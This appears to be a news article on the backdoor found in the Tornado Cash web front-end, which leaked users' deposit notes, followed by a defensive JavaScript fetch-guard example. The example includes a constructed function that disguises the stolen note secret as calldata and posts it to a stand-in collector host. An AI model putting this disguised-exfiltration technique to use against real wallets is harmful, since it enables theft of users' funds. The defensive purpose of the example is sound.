Researcher Finds Backdoor in Tornado Cash Code
A malicious JavaScript backdoor has been discovered in the web front-end of the cryptocurrency mixer Tornado Cash; for nearly two months it transmitted users' deposit notes to a remote server. A deposit note is the secret generated when funds are deposited and is the only thing needed to withdraw them later, so it functions like a private key for funds that have passed through the mixer: whoever holds the note can take the assets even after they have been "mixed". Every deposit made through the IPFS-hosted front-end since January 1, 2024 is affected, regardless of which gateway served it, including ipfs.io, cf-ipfs.com, and eth.link.
How the Backdoor Was Introduced
Reports indicate that the malicious code was introduced two months ago through governance proposal number 47 by an individual or group known as Butterfly Effects, believed to be a community developer. The issue was first identified by a researcher using the alias Gas404, and later confirmed by the founder of SlowMist, a company specializing in blockchain security. In his report, Gas404 urged all stakeholders to quickly veto the malicious governance proposal.
Technical Details and Developer Response
According to Gas404, the malicious code encodes the private deposit notes so that the exfiltrated data looks like ordinary blockchain transaction data, and it obscures its use of the window.fetch function so that the outbound request does not stand out in the source. Tornado Cash developers have confirmed the compromise and warned users about the risk: anyone who deposited through the affected front-end should withdraw the funds tied to their old, potentially compromised deposit notes and redeposit with newly generated ones. Users are also strongly encouraged to revoke their votes for governance proposal 47 so that the change is rolled back and the malicious code removed.
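The two tricks described above, hiding the secret inside calldata-shaped hex and reaching fetch through an obfuscated name, are exactly what a front-end egress guard has to anticipate. The following is an added example, not code from the Tornado Cash project or from the backdoor: it parses a deposit note, derives the encodings of the secret that must never leave the page, and wraps window.fetch so that any request carrying one of them, or any request to a host outside an allow-list, is refused. The function names, the allow-list, the fake window object, the sample note and the stand-in "disguised exfiltration" request are all constructed for this example.

```javascript
// Added example, not code from the Tornado Cash project: a secret-aware egress
// guard for a wallet-style web UI. It knows the bytes the page must never send
// (the deposit note preimage), checks every outbound request for them in several
// encodings, and refuses requests to hosts outside an allow-list. The function
// names, the fake window object and the sample note are all constructed here.

// Deposit note layout used by the Tornado Cash CLI:
//   tornado-<currency>-<amount>-<netId>-0x<124 hex chars>
// The 124 hex chars are the 31-byte nullifier followed by the 31-byte secret.
const NOTE_RE = /^tornado-([a-z]+)-([0-9.]+)-(\d+)-0x([0-9a-fA-F]{124})$/;

function parseNote(note) {
  const m = NOTE_RE.exec(note);
  if (!m) throw new Error('not a well-formed deposit note');
  const preimageHex = m[4].toLowerCase();
  return {
    currency: m[1],
    amount: m[2],
    netId: Number(m[3]),
    nullifierHex: preimageHex.slice(0, 62),
    secretHex: preimageHex.slice(62),
    preimageHex,
  };
}

// Representations of the secret we want to recognise inside outbound data.
// Hex matters most: wrapping the preimage in ABI-style calldata does not
// change its hex digits, so a substring search still finds it.
function secretFingerprints(note) {
  const { preimageHex, nullifierHex, secretHex } = parseNote(note);
  return [
    note,
    preimageHex,
    nullifierHex,
    secretHex,
    Buffer.from(preimageHex, 'hex').toString('base64'),
    Buffer.from(note).toString('base64'),
  ].map((s) => s.toLowerCase());
}

// Collapse a fetch call's URL and body (string or JSON-serialisable only)
// into one lowercase string to scan.
function requestSurface(url, init) {
  let body = init && init.body != null ? init.body : '';
  if (typeof body !== 'string') body = JSON.stringify(body);
  return (String(url) + '\n' + body).toLowerCase();
}

// Pure decision function: returns {blocked, reason} for one outbound request.
function makeRequestInspector(note, allowedOrigins) {
  const fingerprints = secretFingerprints(note);
  return function inspect(url, init) {
    const surface = requestSurface(url, init);
    if (fingerprints.some((fp) => surface.includes(fp))) {
      return { blocked: true, reason: 'secret-in-request' };
    }
    const origin = new URL(String(url), 'https://localhost').origin;
    if (!allowedOrigins.includes(origin)) {
      return { blocked: true, reason: 'unknown-origin' };
    }
    return { blocked: false, reason: null };
  };
}

// Replace win.fetch with a guarded version. Because the property itself is
// replaced, obfuscated lookups such as win['fe' + 'tch'] resolve to the guard
// as well; only a reference captured before installation escapes it.
function installExfilGuard(win, note, allowedOrigins) {
  const inspect = makeRequestInspector(note, allowedOrigins);
  const original = win.fetch;
  const log = [];
  win.fetch = function guardedFetch(url, init) {
    const verdict = inspect(url, init);
    log.push({ url: String(url), ...verdict });
    if (verdict.blocked) {
      return Promise.reject(new Error(`blocked outbound request (${verdict.reason})`));
    }
    return original.call(win, url, init);
  };
  return log;
}

// A constructed stand-in for the disguise the article describes: the note
// preimage is padded into a calldata-shaped hex blob inside a JSON-RPC-looking
// body. This is illustrative only, not the real backdoor's code.
function buildDisguisedExfil(note, collectorUrl) {
  const { preimageHex } = parseNote(note);
  const fakeSelector = 'a9059cbb'; // resembles an ERC-20 transfer selector
  const data = '0x' + fakeSelector + preimageHex.padStart(128, '0');
  const body = JSON.stringify({
    jsonrpc: '2.0', id: 1, method: 'eth_call',
    params: [{ to: '0x' + '11'.repeat(20), data }, 'latest'],
  });
  return { url: collectorUrl, init: { method: 'POST', body } };
}

// Constructed sample note: 31 bytes of 0xab (nullifier), 31 bytes of 0xcd (secret).
const SAMPLE_NOTE = 'tornado-eth-0.1-1-0x' + 'ab'.repeat(31) + 'cd'.repeat(31);

async function demo() {
  const win = { fetch: async (url) => ({ ok: true, url: String(url) }) };
  const log = installExfilGuard(win, SAMPLE_NOTE, ['https://rpc.example']);
  await win.fetch('https://rpc.example', { method: 'POST', body: '{"method":"eth_blockNumber"}' });
  const exfil = buildDisguisedExfil(SAMPLE_NOTE, 'https://rpc.example');
  await win['fe' + 'tch'](exfil.url, exfil.init).catch(() => {});
  await win.fetch('https://collector.example/ping').catch(() => {});
  return log; // allowed, secret-in-request, unknown-origin
}

demo().then((log) => console.log(log));
```

Two caveats a practitioner should keep in mind. First, the guard only helps if it is installed before any page script runs; a backdoored bundle that captures the original fetch (or uses XMLHttpRequest, sendBeacon, or an image load) at startup gets past a wrapper installed later, so the origin allow-list is the more robust of the two checks and is best enforced at the network layer too. Second, none of this replaces verifying that the bundle served from IPFS matches the reviewed build: with a front-end, the content hash the user loads is the trust anchor, and a governance change that swaps it is the supply-chain event to watch for.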
Background on Tornado Cash
Tornado Cash is an open-source, non-custodial mixer implemented as smart contracts on the Ethereum blockchain. It uses zk-SNARKs (Zero-Knowledge Succinct Non-Interactive Arguments of Knowledge): a user deposits a fixed amount into a pool and later proves, without revealing which deposit was theirs, that they know the secret behind one of the pool's deposits, which lets them withdraw to a fresh address with no on-chain link to the deposit. The deposit note is that secret, which is why leaking it defeats both the privacy and the ownership of the funds.
Legal Issues and Aftermath
In August 2022, the U.S. Treasury's OFAC sanctioned Tornado Cash, alleging it had been used to launder criminal proceeds, a move that was unpopular among many in the cryptocurrency industry. In 2023, two of the project's founders were charged with helping criminals launder over $1 billion in stolen cryptocurrency. The original team ceased operations as a result, but the smart contracts remain live on-chain, the project is still steered by its DAO (which is how a governance proposal could change the front-end in the first place), and its codebase continues to be reused for new shadow mixer services.